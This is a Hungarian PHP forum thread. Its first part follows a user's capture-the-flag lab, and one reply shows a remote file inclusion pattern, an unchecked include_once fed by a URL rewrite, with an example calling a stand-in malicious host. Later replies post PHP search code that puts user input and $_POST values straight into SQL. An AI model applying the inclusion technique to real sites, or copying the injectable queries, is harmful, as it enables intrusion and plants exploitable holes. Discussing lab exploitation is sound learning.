Új hozzászólás Aktív témák
-
DNReNTi
őstag
válasz MacCaine #18700 üzenetére
Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen. Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat.
but without you, my life is incomplete, my days are absolutely gray
-
disy68
aktív tag
válasz MacCaine #18700 üzenetére
Miért, gondolom nem privát kulcsokat szeretnél megosztani? Nem attól lesz biztonságos az alkalmazás, hogy "nem tudja senki" mit használnak a háttérben, hanem a használt megoldás mennyire megbízható.
Indulásnak az OWASP lista jó lehet amúgy, ha biztonság a témakör.
“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude
-
DNReNTi
őstag
válasz MacCaine #18705 üzenetére
Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt. En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.
but without you, my life is incomplete, my days are absolutely gray
-
disy68
aktív tag
válasz MacCaine #18705 üzenetére
Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról.“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude
-
Zedz
addikt
Vagy itasd le azt aki a feladatért felel, kérd el a szükséges információt, majd használd a friss tudást. Social engineering.
-
MacCaine
őstag
Mert php-ben van a webapp.
(#18707) DNReNTi
SQLi nem kellett, a webapp már megadta magát, a session lopás is megvolt. XSS az kicsit más tészta.
(#18708) disy68
Eljutottam valameddig, és a továbblépéshez kellene a php-s segítség. LFI megy, RFI nem, ezt kellene megoldanom valahogy. Vagy valami guru megmondja, hogy ez így nem lehetséges php-ben, és akkor keresek valami más sebezhetőséget.
(#18709) Zedz
Jó az ötlet.
[ Szerkesztve ]
-
disy68
aktív tag
válasz MacCaine #18710 üzenetére
RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.
Pl: oldal.hu/aloldal
htaccess-el volt egy átirányítás
RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]
ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);
Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogyinclude_once('http://gonoszoldal.hu/meggonoszabb_script.php
');“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude
-
sztanozs
veterán
válasz MacCaine #18712 üzenetére
Lehet, hogy hülye kérdés:
Biztos ott a fájl, nem lehet, hogy azért nem látod, mert nem is létezik? Vagy ott van, csak nem tudod olvasni?JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
DNReNTi
őstag
-
MacCaine
őstag
válasz sztanozs #18715 üzenetére
Egy változóban van egy string (alkönyvtár), amihez hozzáfűz egy másik stringet (fájlnév). Ezt a második stringet tudom változtatni és beírogatni más fájlneveket, elérési utakat. Ha meg tudnám csinálni, hogy egy scriptet is lefuttasson, akkor a .htaccess kiíratása lenne az utolsó gondolatom.
(#18716) DNReNTi
A "/root/capture_the_flag.txt" file tartalma.
Nincsenek adatok, fájlok, ez egy kifejezetten erre a célra létrehozott vbox image.[ Szerkesztve ]
-
DNReNTi
őstag
válasz MacCaine #18717 üzenetére
Ertem ertem.
En meg mindig inkabb maganak a szervernek (apache/nginx) a toresevel probalkoznek inkabb. Mondom ezt ugy, hogy nem ertek hozza, de valamiert azt gondolom az celravezetobb lehet. De lehet hulyeseg.but without you, my life is incomplete, my days are absolutely gray
-
PumpkinSeed
addikt
válasz MacCaine #18720 üzenetére
A fájl jogosultságait nem tudod megnézni, az ilyeneket úgy szokták megoldani, hogy a group owner az nem root és tudsz futtatni valami fájlt aminek azonos a group ownere mint a flag-nek.
[ Szerkesztve ]
"Akinek elég bátorsága és türelme van ahhoz, hogy egész életében a sötétségbe nézzen, elsőként fogja meglátni benne a fény felvillanását." - Kán
-
DNReNTi
őstag
Ez mar amugy lassan megert volna egy "Hacker" topik nyitast.
but without you, my life is incomplete, my days are absolutely gray
-
sztanozs
veterán
Csináltam topikot, hogy át tudjunk vonulni oda:
https://itcafe.hu/tema/white_hat/friss.html[ Szerkesztve ]
JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
addikt
Ti hogyan valósítanátok meg egy foglalási rendszer kosarát? Nekem csak az jut eszembe, hogy nem sessionben tárolom a tételeket, hanem adatbázisban, és így on the fly leveszi polcról, ha valaki más megnézni.
(#18730) fordfairlane
Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).
[ Szerkesztve ]
-
fordfairlane
veterán
Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).
Én még nem csináltam ilyen rendszert, ahol így kellett kezelni a kosarat, de így elsőre jónak tűnik.
x gon' give it to ya
-
zeix
senior tag
Sziasztok!
A segítségeteket szeretném kérni, hogy jól működik-e a script amit írtam, mert már kezdek belekeveredni.
Szerintem jó, de lehet kihagytam valamit, vagy egyszerűbben is meglehet oldani.
A lényeg hogy két dátum (hónap, nap) között döntse el a program, hogy beleesik-e az adott időpont, a két dátum közé, vagy nem.$ev = '2017';
//$ev = date("Y");
$mostdatum = strtotime("2017-10-05");
//$mostdatum = strtotime("now");
$szezonkezdet='09-01';
$szezonveg='05-30';
$eveleje = strtotime($ev."-01-01");
$evvege = strtotime($ev."-12-31");
$datum1 = date($ev."-".$szezonkezdet);
$datum2 = date($ev."-".$szezonveg);
$ezevszezonkezdet = strtotime($datum1);
$ezevszezonveg = strtotime($datum2);
if ($mostdatum >= $eveleje AND $mostdatum <= $ezevszezonveg)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}
if ($mostdatum >= $ezevszezonveg AND $mostdatum <= $ezevszezonkezdet)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}
if ($mostdatum >= $ezevszezonkezdet AND $mostdatum <= $evvege)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2."+1 year");
}
if ($mostdatum <= $ezevszezonkezdet AND $mostdatum >= $ezevszezonveg)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2);
}
echo date('Y-m-d', $time1);
echo '<br>';
echo date('Y-m-d', $mostdatum);
echo '<br>';
echo date('Y-m-d', $time2);
if ($mostdatum > $time1 AND $mostdatum < $time2)//szezon
{
echo 'ok';
}
else
{
echo 'error';
}[ Szerkesztve ]
-
zeix
senior tag
Igen, mert csak hónap és nap van megadva. Év nincs megadva a szezon változóiban.
Azt ki kell számolni, hogy a jelenlegi dátum a tavalyi év szezon kezdet és az idei év szezonvég között van-e.
pl kezdet:09-01 vég:04-01 a jelenlegi dátum pedig 10-01. de lehet 01-01 is. Ilyenkor kell a tavalyi év 09-01-et venni kezdetnek.[ Szerkesztve ]
-
addikt
Következő kérdés: ti hogy implementálnátok egy jó kereső logikát? Én eddig string konkatenációt használtam több keresőszó esetén és azt toltam be adatbázisba.
Tegyük fel, hogy van egy termékeket taralmazó adatbázisom műszaki cikkeknek. A keresést nyilván szótártáblákra futtatom, a kapcsolat most mindegy. Legyen márkanév, típus, megnevezés tábla és ugyanezzel a névvel mezők.
$sql = "SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes WHERE 1=1"
foreach($keresoszavak as $keresoszo){
$sql .= "AND (markanev LIKE '%".$keresoszo."%' OR tipus LIKE '%".$keresoszo."%' OR megnevezes LIKE '%".$keresoszo."%')"
}Ez csak egy példa, nyilván mindenki ismeri. Biztos van ennél kulturáltabb módszer, ti mire esküsztök?
(#18737) PumpkinSeed
Az kimaradt, hogy osztott tárhelyes LAMP környezetben.
[ Szerkesztve ]
-
biker
nagyúr
Szerintem ez már itt rossz
SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes
meg a lezáró ;-k stb
ezt most csak ide bepötyögted, nem másoltad éles kódból...[ Szerkesztve ]
Elektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |
-
biker
nagyúr
nem szép, de ez is működő megoldás, ha saját főből kell írni.
Persze pdo-val még szebb lenne.
Persze indexelt táblán, mert különben 10-20mp is lehet egy 100.000 soros táblában 3-4 szóra keresni.Aztán ezért lehet megköveznek, mert ez még mysql_* féle megoldás volt, de én mondjuk a match-against párossal keresnék, mert akkor a rendezést lehet score alapján végezni, mennyire releváns az összetett keresés
$termekek = mysql_query("SELECT *, MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST ('$keresett*' IN BOOLEAN MODE) AS score FROM webshop_termekek WHERE MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST('$keresett*' IN BOOLEAN MODE) ORDER BY $order LIMIT {$_POST['start']},$lapozas");
ez egy működő copypaste
és nem kell ciklusban összefűzni a szavakat.Elektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |
-
Hello,
Hülye kérdés.
Linuxon futtatok egy shell scriptet PHP-ból. A kimenetét hogyan tudom/hogyan érdemes elkapni, hogy tudjam formázni?
Gondolom ha a script kimenetében HTML tageket generálok, az nem lesz értelmezve.
Köszi bármilyen ötletetMutogatni való hater díszpinty
-
alpihun
senior tag
Halik.
Egy szövegalapú böngészős játékot írok (mint a sárkányölő pl) és akárhogy kerülgetem szerveridős matekezéssel meg mindenféle megoldásokkal, szükségem lenne arra, hogy tudjak dolgokat előre meghatározott időnként auto megcsinálni, pl cselekvéslimit, shop kínálatfrissítés stb..
Mire van ezekhez szükségem?ui: wampserverrel dolgozom w10en
[ Szerkesztve ]
Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.
-
alpihun
senior tag
válasz DNReNTi #18744 üzenetére
Azt lehet csak úgy mezeileg is? Amiket én kaptam az vagy linuxon van vagy laravel framework. S linux nem lesz szóval kezdjek el laravelt tanulni vagy vagy van olyan megoldás ami barát a wampserveres apache-mysql-php kombóval?
[ Szerkesztve ]
Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.
-
DNReNTi
őstag
válasz alpihun #18746 üzenetére
Windowson nem lehet cronjobokat beallitani, de az elkepzelheto, hogy van ra valami 3rd party tool. Ettol fuggetlenul, en inkabb a linuxos kornyezetet javasolnam. Az idozitett hatterfolyamat pedig nem framework fuggo, tehat tok mindegy, hogy Laravel, vagy Codeigniter, vagy akarmi.
but without you, my life is incomplete, my days are absolutely gray
-
DNReNTi
őstag
Terminalban akarod latni a kimenetet?
Ha igen, a formazasi lehetosegek eleg korlatozottak, kiiratni azecho
, es aprint
csalad fuggvenyeivel tudsz, illetve feladat fuggvenyeben megfontolando output buffering hasznalata.but without you, my life is incomplete, my days are absolutely gray
-
-
DNReNTi
őstag
Ah, ertem, akkor egyszerubb a helyzet. A HTML tagek a bongeszo altal feldolgozodnak, tehat siman megjelenik, ugyan ugy mintha az egy mezei HTML file lenni.
Peldaul xyz.php file tartalma teszem azt:<?php
$title = 'Hello World';
?>
<h1>
<?php echo $title; ?>
</h1>but without you, my life is incomplete, my days are absolutely gray